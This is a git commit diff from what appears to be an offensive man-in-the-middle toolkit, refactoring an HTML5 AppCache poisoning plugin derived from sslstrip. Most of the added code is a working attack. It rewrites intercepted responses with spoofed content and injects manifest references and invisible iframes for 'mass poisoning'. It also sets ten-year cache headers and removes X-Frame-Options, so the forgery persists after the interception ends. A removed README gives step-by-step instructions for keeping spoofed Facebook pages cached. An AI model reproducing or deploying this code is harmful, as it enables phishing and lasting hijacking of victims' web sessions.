revamped appoison plugin and fixed some bugs

This commit is contained in:
byt3bl33d3r 2014-12-15 17:00:05 +01:00
parent ca28de91f6
commit 0defaf7b86
12 changed files with 223 additions and 333 deletions

View file

@ -3,10 +3,6 @@
; see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack. ; see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
; generic settings for tampering engine ; generic settings for tampering engine
enabled=True
tamper_class=libs.sslstripkoto.AppCachePoisonClass
;all settings below are specific for AppCachePoison
templates_path=config/app_cache_poison_templates templates_path=config/app_cache_poison_templates
;enable_only_in_useragents=Chrome|Firefox ;enable_only_in_useragents=Chrome|Firefox

View file

@ -105,8 +105,12 @@ class ClientRequest(Request):
pass pass
url = 'http://' + host + path url = 'http://' + host + path
self.uri = url # set URI to absolute
self.dnsCache.cacheResolution(host, address) #self.dnsCache.cacheResolution(host, address)
hostparts = host.split(':')
self.dnsCache.cacheResolution(hostparts[0], address)
if (not self.cookieCleaner.isClean(self.method, client, host, headers)): if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
logging.debug("Sending expired cookies...") logging.debug("Sending expired cookies...")
@ -121,7 +125,12 @@ class ClientRequest(Request):
self.urlMonitor.getSecurePort(client, url)) self.urlMonitor.getSecurePort(client, url))
else: else:
logging.debug("Sending request via HTTP...") logging.debug("Sending request via HTTP...")
self.proxyViaHTTP(address, self.method, path, postData, headers) #self.proxyViaHTTP(address, self.method, path, postData, headers)
port = 80
if len(hostparts) > 1:
port = int(hostparts[1])
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
def handleHostResolvedError(self, error): def handleHostResolvedError(self, error):
logging.warning("Host resolution error: " + str(error)) logging.warning("Host resolution error: " + str(error))
@ -143,15 +152,18 @@ class ClientRequest(Request):
def process(self): def process(self):
logging.debug("Resolving host: %s" % (self.getHeader('host'))) logging.debug("Resolving host: %s" % (self.getHeader('host')))
host = self.getHeader('host') host = self.getHeader('host')
deferred = self.resolveHost(host) #deferred = self.resolveHost(host)
hostparts = host.split(':')
deferred = self.resolveHost(hostparts[0])
deferred.addCallback(self.handleHostResolvedSuccess) deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError) deferred.addErrback(self.handleHostResolvedError)
def proxyViaHTTP(self, host, method, path, postData, headers): def proxyViaHTTP(self, host, method, path, postData, headers, port):
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
connectionFactory.protocol = ServerConnection connectionFactory.protocol = ServerConnection
self.reactor.connectTCP(host, 80, connectionFactory) #self.reactor.connectTCP(host, 80, connectionFactory)
self.reactor.connectTCP(host, port, connectionFactory)
def proxyViaSSL(self, host, method, path, postData, headers, port): def proxyViaSSL(self, host, method, path, postData, headers, port):
clientContextFactory = ssl.ClientContextFactory() clientContextFactory = ssl.ClientContextFactory()

View file

@ -20,7 +20,6 @@ import logging, re, string, random, zlib, gzip, StringIO, sys
import plugins import plugins
from twisted.web.http import HTTPClient from twisted.web.http import HTTPClient
from libs.sslstripkoto.ResponseTampererFactory import ResponseTampererFactory
from URLMonitor import URLMonitor from URLMonitor import URLMonitor
from libs.sergioproxy.ProxyPlugins import ProxyPlugins from libs.sergioproxy.ProxyPlugins import ProxyPlugins
@ -43,7 +42,6 @@ class ServerConnection(HTTPClient):
self.headers = headers self.headers = headers
self.client = client self.client = client
self.urlMonitor = URLMonitor.getInstance() self.urlMonitor = URLMonitor.getInstance()
self.responseTamperer = ResponseTampererFactory.getTampererInstance()
self.plugins = ProxyPlugins.getInstance() self.plugins = ProxyPlugins.getInstance()
self.isImageRequest = False self.isImageRequest = False
self.isCompressed = False self.isCompressed = False
@ -88,7 +86,7 @@ class ServerConnection(HTTPClient):
def sendHeaders(self): def sendHeaders(self):
for header, value in self.headers.items(): for header, value in self.headers.items():
logging.debug("Sending header: %s : %s" % (header, value)) logging.debug("Sending header: (%s => %s)" % (header, value))
self.sendHeader(header, value) self.sendHeader(header, value)
self.endHeaders() self.endHeaders()
@ -145,6 +143,8 @@ class ServerConnection(HTTPClient):
else: else:
self.client.setHeader(key, value) self.client.setHeader(key, value)
logging.debug("Receiving header: (%s => %s)" % (key, value))
def handleEndHeaders(self): def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None): if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength) self.client.setHeader("Content-Length", self.contentLength)
@ -175,11 +175,6 @@ class ServerConnection(HTTPClient):
logging.debug("Read from server:\n" + data) logging.debug("Read from server:\n" + data)
data = self.replaceSecureLinks(data) data = self.replaceSecureLinks(data)
#Hook the ResponseTampererFactory
if self.responseTamperer:
data = self.responseTamperer.tamper(self.client.uri, data, self.client.responseHeaders, self.client.getAllHeaders(), self.client.getClientIP())
res = self.plugins.hook() res = self.plugins.hook()
data = res['data'] data = res['data']

View file

@ -32,6 +32,7 @@ class URLMonitor:
def __init__(self): def __init__(self):
self.strippedURLs = set() self.strippedURLs = set()
self.strippedURLPorts = {} self.strippedURLPorts = {}
self.redirects = []
self.faviconReplacement = False self.faviconReplacement = False
def isSecureLink(self, client, url): def isSecureLink(self, client, url):
@ -66,6 +67,19 @@ class URLMonitor:
else: else:
return 443 return 443
def addRedirection(self, from_url, to_url):
for s in self.redirects:
if from_url in s:
s.add(to_url)
return
self.redirects.append(set([from_url,to_url]))
def getRedirectionSet(self, url):
for s in self.redirects:
if url in s:
return s
return set([url])
def addSecureLink(self, client, url): def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2 methodIndex = url.find("//") + 2
method = url[0:methodIndex] method = url[0:methodIndex]

View file

@ -1,154 +0,0 @@
import logging, re, os.path, time
from datetime import date
from libs.sslstripkoto.DummyResponseTamperer import DummyResponseTamperer
class AppCachePoisonClass(DummyResponseTamperer):
'''
AppCachePosion performs HTML5 AppCache poisioning attack - see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html
'''
mass_poisoned_browsers = []
def tamper(self, url, data, headers, req_headers, ip):
if not self.isEnabled():
return data
if "enable_only_in_useragents" in self.config:
regexp = self.config["enable_only_in_useragents"]
if regexp and not re.search(regexp,req_headers["user-agent"]):
logging.log(logging.DEBUG, "Tampering disabled in this useragent (%s)" % (req_headers["user-agent"]))
return data
urls = self.urlMonitor.getRedirectionSet(url)
(s,element,url) = self.getSectionForUrls(urls)
if not s:
data = self.tryMassPoison(url, data, headers, req_headers, ip)
return data
logging.log(logging.WARNING, "Found URL %s in section %s" % (url, s['__name__']))
p = self.getTemplatePrefix(s)
if element == 'tamper':
logging.log(logging.WARNING, "Poisoning tamper URL with template %s" % (p))
if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r')
data = self.decorate(f.read(), s)
f.close()
elif os.path.exists(p + '.append'): # append file to body
f = open(p + '.append','r')
appendix = self.decorate(f.read(), s)
f.close()
# append to body
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
# add manifest reference
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
elif element == "manifest":
logging.log(logging.WARNING, "Poisoning manifest URL")
data = self.getSpoofedManifest(url, s)
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
elif element == "raw": # raw resource to modify, it does not have to be html
logging.log(logging.WARNING, "Poisoning raw URL")
if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r')
data = self.decorate(f.read(), s)
f.close()
elif os.path.exists(p + '.append'): # append file to body
f = open(p + '.append','r')
appendix = self.decorate(f.read(), s)
f.close()
# append to response body
data += appendix
self.cacheForFuture(headers)
self.removeDangerousHeaders(headers)
return data
def tryMassPoison(self, url, data, headers, req_headers, ip):
browser_id = ip + req_headers.get("user-agent", "")
if not 'mass_poison_url_match' in self.config: # no url
return data
if browser_id in self.mass_poisoned_browsers: #already poisoned
return data
if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]): #not HTML
return data
if 'mass_poison_useragent_match' in self.config and not "user-agent" in req_headers:
return data
if not re.search(self.config['mass_poison_useragent_match'], req_headers['user-agent']): #different UA
return data
if not re.search(self.config['mass_poison_url_match'], url): #different url
return data
logging.log(logging.WARNING, "Adding AppCache mass poison for URL %s, id %s" % (url, browser_id))
appendix = self.getMassPoisonHtml()
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip
return data
def getMassPoisonHtml(self):
html = "<div style=\"position:absolute;left:-100px\">"
for i in self.config:
if isinstance(self.config[i], dict):
if self.config[i].has_key('tamper_url') and not self.config[i].get('skip_in_mass_poison', False):
html += "<iframe sandbox=\"\" style=\"opacity:0;visibility:hidden\" width=\"1\" height=\"1\" src=\"" + self.config[i]['tamper_url'] + "\"></iframe>"
return html + "</div>"
def cacheForFuture(self, headers):
ten_years = 315569260
headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)])
headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh
in_ten_years = date.fromtimestamp(time.time() + ten_years)
headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])
def removeDangerousHeaders(self, headers):
headers.removeHeader("X-Frame-Options")
def getSpoofedManifest(self, url, section):
p = self.getTemplatePrefix(section)
if not os.path.exists(p+'.manifest'):
p = self.getDefaultTemplatePrefix()
f = open(p + '.manifest', 'r')
manifest = f.read()
f.close()
return self.decorate(manifest, section)
def decorate(self, content, section):
for i in section:
content = content.replace("%%"+i+"%%", section[i])
return content
def getTemplatePrefix(self, section):
if section.has_key('templates'):
return self.config['templates_path'] + '/' + section['templates']
return self.getDefaultTemplatePrefix()
def getDefaultTemplatePrefix(self):
return self.config['templates_path'] + '/default'
def getManifestUrl(self, section):
return section.get("manifest_url",'/robots.txt')
def getSectionForUrls(self, urls):
for url in urls:
for i in self.config:
if isinstance(self.config[i], dict): #section
section = self.config[i]
if section.get('tamper_url',False) == url:
return (section, 'tamper',url)
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
return (section, 'tamper',url)
if section.get('manifest_url',False) == url:
return (section, 'manifest',url)
if section.get('raw_url',False) == url:
return (section, 'raw',url)
return (False,'',urls.copy().pop())

View file

@ -1,47 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike, Krzysztof Kotowicz
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
from libs.sslstrip.URLMonitor import URLMonitor
class DummyResponseTamperer:
'''
DummyResponseTamperer is an exemplary class for server response tampering.
'''
def __init__(self, config):
self.config = config
self.urlMonitor = URLMonitor.getInstance()
logging.log(logging.DEBUG, "Tampering enabled.")
def isEnabled(self):
return self.config["enabled"]
def tamper(self, url, data, headers, req_headers, ip):
if not self.isEnabled():
return data
# headers manipulation - see http://twistedmatrix.com/documents/10.1.0/api/twisted.web.http_headers.Headers.html
# setting headers
#headers.setRawHeaders("X-aaa", ["aaa"])
# getting headers
#headers.getRawHeaders("Content-Type")
return data

View file

@ -1,44 +0,0 @@
I've modified sslstrip to be able to tamper with server responses.
One prepared example of tampering attack is HTML5 AppCache poisoning attack that places the
modified responses in browsers long-lasting HTML5 AppCache so that the spoofing continues
even after the victim is no longer MITMed.
Exemplary response tampering with HTML AppCachePoison:
1) python sslstrip.py -t app_cache_poison/config.ini
2) While under MITM, visit http://example.com to display tampered content
3) Visit http://www.facebook.com in AppCache supporting browser (Chrome, Firefox, Opera, Safari).
In Firefox you have to agree to store offline content, Chrome does not display any confirmations.
4) Stop MITM, restart browser, go for coffee or holidays
5) Visit http://www.facebook.com again - the spoofed content is still there!
As a bonus, once google analytics HTTP version will be requested, the spoofed content of it will be cached for 10 years.
EASY LOCAL TESTING MITM (for Ubuntu systems):
# create sslstrip admin user
# forward local traffic
$ sudo ./testmitm.sh start `id -u sslstrip`
# run sslstrip to hijack traffic
$ chown -R sslstrip /path/to/sslstrip/
$ su sslstrip
$ python sslstrip.py -t app_cache_poison/config.ini -p
# stop
$ sudo ./testmitm.sh stop
More info:
http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html
This functionality has been added by Krzysztof Kotowicz
<kkotowicz at gmail dot com>

View file

@ -1,62 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike, Krzysztof Kotowicz
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, ConfigParser
class ResponseTampererFactory:
'''
ResponseTampererFactory creates response tamperer that modifies responses to clients based on config file setting.
'''
_instance = None
_default_config = {"enabled": False, "tamper_class": "libs.sslstripkoto.DummyResponseTamperer"}
def __init__(self):
pass
def createTamperer(configFile):
logging.log(logging.DEBUG, "Reading tamper config file: %s" % (configFile))
config = ResponseTampererFactory._default_config.copy()
if configFile:
config.update(ResponseTampererFactory.parseConfig(configFile))
if config['enabled']:
logging.log(logging.DEBUG, "Loading tamper class: %s" % (config["tamper_class"]))
m = __import__(config["tamper_class"], globals(), locals(), config["tamper_class"])
return getattr(m, m.__name__.replace(m.__package__ + ".", ''))(config)
def parseConfig(configFile):
config = ConfigParser.ConfigParser()
config.read(configFile)
readConfig = config._sections
readConfig.update(config.defaults())
return readConfig
def getTampererInstance():
return ResponseTampererFactory._instance
def buildTamperer(configFile):
if ResponseTampererFactory._instance == None:
ResponseTampererFactory._instance = ResponseTampererFactory.createTamperer(configFile)
getTampererInstance = staticmethod(getTampererInstance)
buildTamperer = staticmethod(buildTamperer)
createTamperer = staticmethod(createTamperer)
parseConfig = staticmethod(parseConfig)

View file

@ -20,7 +20,6 @@ import logging, re, string, random, zlib, gzip, StringIO
import plugins import plugins
from twisted.web.http import HTTPClient from twisted.web.http import HTTPClient
from libs.ssltripkoto.ResponseTampererFactory import ResponseTampererFactory
from URLMonitor import URLMonitor from URLMonitor import URLMonitor
from libs.sergioproxy.ProxyPlugins import ProxyPlugins from libs.sergioproxy.ProxyPlugins import ProxyPlugins
@ -174,11 +173,6 @@ class ServerConnection(HTTPClient):
#logging.log(self.getLogLevel(), "Read from server:\n <large data>" ) #logging.log(self.getLogLevel(), "Read from server:\n <large data>" )
data = self.replaceSecureLinks(data) data = self.replaceSecureLinks(data)
#Hook the ResponseTampererFactory
if self.responseTamperer:
data = self.responseTamperer.tamper(self.client.uri, data, self.client.responseHeaders, self.client.getAllHeaders(), self.client.getClientIP())
res = self.plugins.hook() res = self.plugins.hook()
data = res['data'] data = res['data']

View file

@ -25,6 +25,7 @@ class URLMonitor:
def __init__(self): def __init__(self):
self.strippedURLs = set() self.strippedURLs = set()
self.strippedURLPorts = {} self.strippedURLPorts = {}
self.redirects = []
self.faviconReplacement = False self.faviconReplacement = False
hsts_config = ConfigObj("./config/hsts_bypass.cfg") hsts_config = ConfigObj("./config/hsts_bypass.cfg")
@ -65,6 +66,19 @@ class URLMonitor:
else: else:
return 443 return 443
def addRedirection(self, from_url, to_url):
for s in self.redirects:
if from_url in s:
s.add(to_url)
return
self.redirects.append(set([from_url,to_url]))
def getRedirectionSet(self, url):
for s in self.redirects:
if url in s:
return s
return set([url])
def addSecureLink(self, client, url): def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2 methodIndex = url.find("//") + 2
method = url[0:methodIndex] method = url[0:methodIndex]

View file

@ -1,17 +1,189 @@
#
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
#######################################################################################################
from plugins.plugin import Plugin from plugins.plugin import Plugin
from libs.sslstripkoto.ResponseTampererFactory import ResponseTampererFactory from datetime import date
#import threading from libs.sslstrip.URLMonitor import URLMonitor
import logging
import ConfigParser
import re
import os.path
import time
class AppCachePlugin(Plugin): class AppCachePlugin(Plugin):
name = "App Cache Poison" name = "App Cache Poison"
optname = "appoison" optname = "appoison"
desc = "Performs App Cache Poisoning attacks" desc = "Performs App Cache Poisoning attacks"
implements = ["handleResponse"]
has_opts = False has_opts = False
def initialize(self, options): def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace''' '''Called if plugin is enabled, passed the options namespace'''
self.options = options self.options = options
self.config_file = "./config/app_cache_poison.cfg" self.config_file = "./config/app_cache_poison.cfg"
self.config = None
self.mass_poisoned_browsers = []
self.urlMonitor = URLMonitor.getInstance()
print "[*] App Cache Poison plugin online" print "[*] App Cache Poison plugin online"
ResponseTampererFactory().buildTamperer(self.config_file) self.createTamperer(self.config_file)
def parseConfig(self, configFile):
config = ConfigParser.ConfigParser()
config.read(configFile)
readConfig = config._sections
readConfig.update(config.defaults())
return readConfig
def createTamperer(self, configFile):
logging.debug("Reading tamper config file: %s" % (configFile))
self.config = self.parseConfig(configFile)
def handleResponse(self, request, data):
url = request.client.uri
req_headers = request.client.getAllHeaders()
headers = request.client.responseHeaders
ip = request.client.getClientIP()
if "enable_only_in_useragents" in self.config:
regexp = self.config["enable_only_in_useragents"]
if regexp and not re.search(regexp,req_headers["user-agent"]):
logging.debug("Tampering disabled in this useragent (%s)" % (req_headers["user-agent"]))
return {'request': request, 'data': data}
urls = self.urlMonitor.getRedirectionSet(url)
(s,element,url) = self.getSectionForUrls(urls)
if not s:
data = self.tryMassPoison(url, data, headers, req_headers, ip)
return {'request': request, 'data': data}
logging.debug("Found URL %s in section %s" % (url, s['__name__']))
p = self.getTemplatePrefix(s)
if element == 'tamper':
logging.debug("Poisoning tamper URL with template %s" % (p))
if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r')
data = self.decorate(f.read(), s)
f.close()
elif os.path.exists(p + '.append'): # append file to body
f = open(p + '.append','r')
appendix = self.decorate(f.read(), s)
f.close()
# append to body
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
# add manifest reference
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
elif element == "manifest":
logging.debug("Poisoning manifest URL")
data = self.getSpoofedManifest(url, s)
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
elif element == "raw": # raw resource to modify, it does not have to be html
logging.debug("Poisoning raw URL")
if os.path.exists(p + '.replace'): # replace whole content
f = open(p + '.replace','r')
data = self.decorate(f.read(), s)
f.close()
elif os.path.exists(p + '.append'): # append file to body
f = open(p + '.append','r')
appendix = self.decorate(f.read(), s)
f.close()
# append to response body
data += appendix
self.cacheForFuture(headers)
self.removeDangerousHeaders(headers)
return {'request': request, 'data': data}
def tryMassPoison(self, url, data, headers, req_headers, ip):
browser_id = ip + req_headers.get("user-agent", "")
if not 'mass_poison_url_match' in self.config: # no url
return data
if browser_id in self.mass_poisoned_browsers: #already poisoned
return data
if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]): #not HTML
return data
if 'mass_poison_useragent_match' in self.config and not "user-agent" in req_headers:
return data
if not re.search(self.config['mass_poison_useragent_match'], req_headers['user-agent']): #different UA
return data
if not re.search(self.config['mass_poison_url_match'], url): #different url
return data
logging.debug("Adding AppCache mass poison for URL %s, id %s" % (url, browser_id))
appendix = self.getMassPoisonHtml()
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip
return data
def getMassPoisonHtml(self):
html = "<div style=\"position:absolute;left:-100px\">"
for i in self.config:
if isinstance(self.config[i], dict):
if self.config[i].has_key('tamper_url') and not self.config[i].get('skip_in_mass_poison', False):
html += "<iframe sandbox=\"\" style=\"opacity:0;visibility:hidden\" width=\"1\" height=\"1\" src=\"" + self.config[i]['tamper_url'] + "\"></iframe>"
return html + "</div>"
def cacheForFuture(self, headers):
ten_years = 315569260
headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)])
headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh
in_ten_years = date.fromtimestamp(time.time() + ten_years)
headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])
def removeDangerousHeaders(self, headers):
headers.removeHeader("X-Frame-Options")
def getSpoofedManifest(self, url, section):
p = self.getTemplatePrefix(section)
if not os.path.exists(p+'.manifest'):
p = self.getDefaultTemplatePrefix()
f = open(p + '.manifest', 'r')
manifest = f.read()
f.close()
return self.decorate(manifest, section)
def decorate(self, content, section):
for i in section:
content = content.replace("%%"+i+"%%", section[i])
return content
def getTemplatePrefix(self, section):
if section.has_key('templates'):
return self.config['templates_path'] + '/' + section['templates']
return self.getDefaultTemplatePrefix()
def getDefaultTemplatePrefix(self):
return self.config['templates_path'] + '/default'
def getManifestUrl(self, section):
return section.get("manifest_url",'/robots.txt')
def getSectionForUrls(self, urls):
for url in urls:
for i in self.config:
if isinstance(self.config[i], dict): #section
section = self.config[i]
if section.get('tamper_url',False) == url:
return (section, 'tamper',url)
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
return (section, 'tamper',url)
if section.get('manifest_url',False) == url:
return (section, 'manifest',url)
if section.get('raw_url',False) == url:
return (section, 'raw',url)
return (False,'',urls.copy().pop())